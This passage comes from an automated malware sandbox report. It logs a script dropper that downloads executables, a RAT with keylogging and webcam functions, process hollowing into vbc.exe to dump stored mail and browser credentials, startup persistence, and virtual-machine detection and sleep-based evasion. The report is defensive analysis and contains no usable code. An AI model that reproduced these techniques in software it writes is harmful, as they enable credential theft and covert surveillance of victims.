            Source: tmp87E4.tmp.exe, tmp87E4.tmp.exe.2.drBinary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeThread delayed: delay time: 180000
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeWindow / User API: threadDelayed 5377
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeWindow / User API: threadDelayed 703
            Source: C:\Users\user\AppData\Roaming\servieda.exeWindow / User API: threadDelayed 5808
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeWindow / User API: threadDelayed 684
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeWindow / User API: threadDelayed 9071
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exe TID: 2272Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\servieda.exe TID: 4188Thread sleep count: 5808 > 30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe TID: 3084Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 340Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 4148Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 4148Thread sleep count: 90 > 30
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 476Thread sleep count: 684 > 30
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe TID: 476Thread sleep count: 9071 > 30
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 1236Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 4132Thread sleep time: -120000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 5052Thread sleep time: -140000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548Thread sleep time: -1100000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548Thread sleep time: -200000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 5368Thread sleep time: -180000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe TID: 3548Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\servieda.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\servieda.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeThread delayed: delay time: 120000
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeThread delayed: delay time: 140000
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeThread delayed: delay time: 100000
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeThread delayed: delay time: 100000
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeThread delayed: delay time: 180000
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeThread delayed: delay time: 922337203685477
            Source: wscript.exe, 00000000.00000002.373872355.000001B866570000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWX
            Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: tmp87E4.tmp.exe.2.drBinary or memory string: vmware
            Source: Tmp.exe, 00000001.00000002.368050117.0000000000690000.00000004.00000020.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\b8b}
            Source: servieda.exe, 00000003.00000002.600571668.000000000067B000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
            Source: wscript.exe, 00000000.00000003.342673260.000001B8665AF000.00000004.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.610746899.0000000005046000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: wscript.exe, 00000000.00000002.374755417.000001B866F40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.610124261.000000001AF20000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.611349583.00000000054E0000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.614934785.0000000007300000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: tmpFB21.tmp.exe, 0000000D.00000002.601888472.0000000001070000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllNN
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00403C3D LoadLibraryA,GetProcAddress,strcpy,
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Roaming\servieda.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: Tmp.exe.0.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\System32\wscript.exeDomain query: ia601504.us.archive.org
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 207.241.227.114 187
            .NET source code references suspicious native API functionsShow sources
            Source: Tmp.exe.0.dr, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
            Source: Tmp.exe.0.dr, SlayerRAT.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
            Source: servieda.exe.1.dr, SlayerRAT.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
            Source: servieda.exe.1.dr, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
            Source: 1.0.Tmp.exe.1d0000.0.unpack, SlayerRAT.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
            Source: 1.0.Tmp.exe.1d0000.0.unpack, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
            Source: 1.2.Tmp.exe.1d0000.0.unpack, SlayerRAT.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
            Source: 1.2.Tmp.exe.1d0000.0.unpack, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
            Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, OK.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
            Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
            Source: 2.2.pgr.exe.80000.0.unpack, OK.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
            Source: 2.2.pgr.exe.80000.0.unpack, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
            Source: 2.0.pgr.exe.80000.0.unpack, OK.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
            Source: 2.0.pgr.exe.80000.0.unpack, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
            Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, SlayerRAT.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
            Source: d4c6a6df7bab3dad31763de990c4ed82.exe.3.dr, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
            Source: 3.2.servieda.exe.a0000.0.unpack, SlayerRAT.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
            Source: 3.2.servieda.exe.a0000.0.unpack, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
            Source: 3.0.servieda.exe.a0000.0.unpack, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
            Source: 3.0.servieda.exe.a0000.0.unpack, SlayerRAT.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
            Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, SlayerRAT.csReference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
            Source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, kl.csReference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
            Allocates memory in foreign processesShow sources
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeSection unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 412000
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 416000
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 418000
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 443000
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 44F000
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 452000
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\Tmp.exe 'C:\Users\user\AppData\Local\Temp\Tmp.exe'
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\pgr.exe 'C:\Users\user\AppData\Local\Temp\pgr.exe'
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeProcess created: C:\Users\user\AppData\Roaming\servieda.exe 'C:\Users\user\AppData\Roaming\servieda.exe'
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess created: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeProcess created: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe 'C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
            Source: pgr.exe, 00000002.00000002.608687643.00000000028FB000.00000004.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.602209717.0000000002B5B000.00000004.00000001.sdmpBinary or memory string: Program Manager
            Source: wscript.exe, 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, Tmp.exe, pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, d4c6a6df7bab3dad31763de990c4ed82.exe, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmp, Tmp.exe.0.drBinary or memory string: Shell_TrayWnd
            Source: pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.600919453.0000000000B90000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: pgr.exe, 00000002.00000002.608687643.00000000028FB000.00000004.00000001.sdmpBinary or memory string: Program Manager|9kr
            Source: pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.600919453.0000000000B90000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmpBinary or memory string: &Program Manager
            Source: Tmp.exe, 00000001.00000003.357963237.000000000067B000.00000004.00000001.sdmpBinary or memory string: Shell_traywndnlp
            Source: pgr.exe, 00000002.00000002.601249892.0000000000E40000.00000002.00000001.sdmp, servieda.exe, 00000003.00000002.600919453.0000000000B90000.00000002.00000001.sdmp, tmp87E4.tmp.exe, 0000000C.00000002.600807119.0000000001520000.00000002.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.602904401.0000000001750000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: servieda.exe, 00000003.00000003.369009096.000000000067B000.00000004.00000001.sdmpBinary or memory string: Shell_traywndG
            Source: Tmp.exe, 00000001.00000003.357963237.000000000067B000.00000004.00000001.sdmp, servieda.exe, 00000003.00000003.369009096.000000000067B000.00000004.00000001.sdmpBinary or memory string: Shell_traywnd8
            Source: pgr.exe, 00000002.00000002.608687643.00000000028FB000.00000004.00000001.sdmpBinary or memory string: Program Manager<
            Source: wscript.exe, 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, Tmp.exe, servieda.exe, d4c6a6df7bab3dad31763de990c4ed82.exe, Tmp.exe.0.drBinary or memory string: Shell_traywnd
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
